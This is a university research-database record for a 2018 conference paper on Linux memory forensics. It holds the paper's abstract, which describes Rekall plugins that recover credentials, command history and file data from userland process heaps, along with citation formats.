Linux Memory Forensics: Expanding Rekall Userland Investigation
Stadlinger J, Block F, Dewald A (2018)
Publication Language: English
Publication Type: Conference contribution, Original article
Publication year: 2018
Conference Proceedings Title: 2018 11th International Conference on IT Security Incident Management & IT Forensics (IMF)
Event location: Hamburg
Abstract
The field of memory forensics is getting more important in forensic investigations for obtaining valuable data of a running system. Besides kernel artifacts, there might be also plenty of interesting data in the heap of a user space process, but unfortunately, that area has not yet received the attention it deserves in the forensic field. This paper shows that the heap of user applications may also be a rich source of information including data like credentials that can be helpful in a forensic investigation. With the help of the HeapAnalysis plugins, previously published by Block, we examined the heap of selected Linux userland software and managed to identify data of interest and also certain application-internal structures, which link those data snippets together. The result of our analysis is a set of plugins for the Rekall framework, enabling an investigator to automatically extract process-related information such as login credentials, command history and file information for those applications.
Authors with CRIS profile
Involved external institutions
How to cite
APA:
Stadlinger, J., Block, F., & Dewald, A. (2018). Linux Memory Forensics: Expanding Rekall Userland Investigation. In IEEE Computer Society (Eds.), 2018 11th International Conference on IT Security Incident Management & IT Forensics (IMF). Hamburg, DE.
MLA:
Stadlinger, Johannes, Frank Block, and Andreas Dewald. "Linux Memory Forensics: Expanding Rekall Userland Investigation." Proceedings of the 11th International Conference on IT Security Incident Management & IT Forensics (IMF 2018), Hamburg Ed. IEEE Computer Society, 2018.
BibTeX: Download